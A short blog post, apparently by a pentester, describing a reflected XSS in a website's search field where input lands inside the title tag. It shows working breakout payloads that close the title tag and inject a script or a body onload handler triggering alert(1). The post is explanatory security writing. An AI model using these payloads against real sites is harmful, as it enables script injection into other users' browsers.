You are currently browsing the tag archive for the ‘XSS’ tag.

I was kind of looking (pentester way) on a website and I saw that they could have a XSS flaw on the search field. Inserting the following string „<b>tester” on the search field, it get reflected back but just on the <title> tag like this.

<title>Cauta <b>tester – ……………</title>

There is a classical XSS, but what made that one interesting to me was the <title> tag.

<title>Cauta<script>alert(1);</script> – ……………</title>  => is not working

but

</title><script>alert(1)</script>&submit=Cauta => is working

Speaking with a friend, he gave me also an alternative the idea of inserting the <body> tag and create in this way a new HTML document.

So:

</title><body onload=’javascript:alert(1)’>

worked also like a charm.

Iulie 2017
L M M M V S D
« Mar    
 12
3456789
10111213141516
17181920212223
24252627282930
31